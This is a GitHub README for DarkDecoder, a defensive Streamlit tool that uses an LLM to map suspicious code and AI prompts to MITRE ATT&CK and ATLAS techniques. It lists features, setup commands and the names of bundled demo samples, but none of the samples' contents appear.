Skip to content

Pyhroff/darkdecoder

Repository files navigation

πŸ’€ DarkDecoder

Dual-Framework Cyber Threat Intelligence Platform

Paste suspicious code or AI inputs. Get instant threat intelligence mapped to MITRE ATT&CK and MITRE ATLAS in under 20 seconds.

Python Streamlit Groq MITRE ATT&CK MITRE ATLAS License CI


What Is DarkDecoder?

DarkDecoder is the only free tool that combines two official cyber threat frameworks β€” MITRE ATT&CK for traditional malware and MITRE ATLAS for AI/ML adversarial threats β€” in a single platform.

Security analysts waste hours manually cross-referencing malicious code against threat databases. DarkDecoder does it in 20 seconds: paste code or a suspicious prompt, get a full breakdown β€” danger score, technique mappings, IOCs, kill chain, remediation steps, and exportable reports.

MITRE ATLAS coverage: 40+ techniques across 13 tactics β€” including all LLM-specific techniques (prompt injection, jailbreak, meta-prompt extraction, plugin compromise, LLM data leakage).


Three Analysis Modules

Module 1 β€” Malware Scanner (MITRE ATT&CK)

  • Deobfuscates base64, hex, eval chains, string concatenation
  • Classifies malware type: Ransomware, Keylogger, Reverse Shell, Cryptominer, Webshell, and more
  • Danger score 1–10 with full justification
  • Maps to MITRE ATT&CK T-codes (T1059, T1547, T1486, etc.)
  • Extracts IOCs: IPs, domains, URLs, file paths, registry keys, mutexes
  • Plain English summary for non-technical stakeholders
  • Actionable remediation steps

Module 2 β€” AI Threat Analyzer (MITRE ATLAS v4)

  • 40+ ATLAS techniques across all 13 tactics: Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, ML Attack Staging, Defense Evasion, Discovery, Collection, Exfiltration, and Impact
  • Detects LLM-specific attacks: prompt injection (AML.T0051), jailbreak (AML.T0054), meta-prompt extraction (AML.T0058), plugin compromise (AML.T0057), LLM data leakage (AML.T0056)
  • Flags training data poisoning, backdoor insertion, model extraction, membership inference
  • Identifies ML supply chain attacks and surrogate model construction
  • Dual-Framework mode: run both ATLAS + ATT&CK on the same input when code targets ML infrastructure

Module 3 β€” Red Team Intel (ATT&CK Kill Chain)

  • Full 10-phase ATT&CK kill chain visualization
  • Weaponization score + stealth rating (1–10)
  • Privilege escalation level: None β†’ Local β†’ Admin β†’ Domain Admin β†’ SYSTEM/Root
  • Detection difficulty rating + CVSS vector string generation
  • Named APT group / threat actor similarity matching
  • Full attack narrative from an adversary perspective

Features

Feature Details
File Upload .py .js .php .ps1 .sh .bat .rb .go .cs .vbs (up to 200 MB)
Report Export PDF Β· JSON Β· TXT β€” one click, all modules
Attack Timeline Step-by-step progression with MITRE technique IDs
Session History All scans logged with timestamps in sidebar
Hash Analysis SHA256 + MD5 computed on every submission
Built-in Samples Pre-loaded demo payloads including GCG suffix + Crescendo escalation
Zero Cost Runs entirely on Groq's free tier β€” no credit card
ATLAS Depth 40+ techniques, 13 tactics, tactic name shown per technique

Tech Stack

Component Technology
AI Engine Groq API β€” Llama 3.3 70B Versatile
Threat Framework 1 MITRE ATT&CK v14
Threat Framework 2 MITRE ATLAS v4 (AI/ML adversarial threats)
Backend Python 3.10+
Frontend Streamlit
PDF Generation fpdf2
Environment python-dotenv

Quick Start

# 1. Clone
git clone https://github.com/Pyhroff/darkdecoder
cd darkdecoder

# 2. Install dependencies
pip install -r requirements.txt

# 3. Add your free Groq API key
cp .env.example .env
# Open .env and set: GROQ_API_KEY=your_key_here

# 4. Run
streamlit run app.py

Get a free Groq API key at console.groq.com β€” no credit card, 14,400 requests/day free tier.


Built-in Demo Samples

Module Sample Payloads
Malware Scanner PowerShell Dropper Β· Python Reverse Shell Β· JS Cryptominer Β· PHP Webshell Β· Ransomware Stub
AI Threat Analyzer Prompt Injection Β· Data Poisoning Β· Model Extraction Β· Jailbreak Β· GCG Adversarial Suffix Β· Crescendo Escalation
Red Team Intel Privilege Escalation Β· Lateral Movement Β· Defense Evasion Β· C2 Beacon

Why DarkDecoder?

DarkDecoder VirusTotal Traditional SIEMs
MITRE ATT&CK mapping βœ… Partial βœ… (paid)
MITRE ATLAS (AI threats) βœ… 40+ techniques ❌ ❌
Red team kill chain βœ… ❌ ❌
LLM-specific attacks βœ… ❌ ❌
Free tier βœ… βœ… ❌
Self-hostable βœ… ❌ ❌

Project Structure

darkdecoder/
β”œβ”€β”€ app.py                 # Main Streamlit UI (3 modules + dual-framework mode)
β”œβ”€β”€ analyzer.py            # MITRE ATT&CK malware scanner
β”œβ”€β”€ ai_analyzer.py         # MITRE ATLAS v4 AI threat detector (40+ techniques)
β”œβ”€β”€ redteam_analyzer.py    # Red team kill chain analyzer
β”œβ”€β”€ report_generator.py    # PDF report generation
β”œβ”€β”€ requirements.txt
β”œβ”€β”€ .env.example
└── .gitignore

Security Portfolio

DarkDecoder is part of a three-project AI security portfolio:

Project Role Frameworks
DarkDecoder Threat intelligence β€” what is the attack? MITRE ATT&CK + ATLAS
PromptStrike Active red teaming β€” can you jailbreak it? PAIR Β· TAP Β· Crescendo Β· GCG
SOC PARALLAX Behavioral defense β€” detect the attacker Neo4j Β· LangGraph Β· Ollama

License

MIT License β€” free to use, modify, and deploy.


DarkDecoder β€” Because malware doesn't explain itself.

About

πŸ›‘οΈ Dual-framework cyber threat-intel platform β€” paste suspicious code, get AI-powered MITRE ATT&CK + ATLAS analysis, IOCs, and a red-team kill chain in under 20s. Python Β· Streamlit Β· Groq Llama 3.3 70B.

Topics

Resources

License

Security policy

Stars

Watchers

Forks

Packages

 
 
 

Contributors

Languages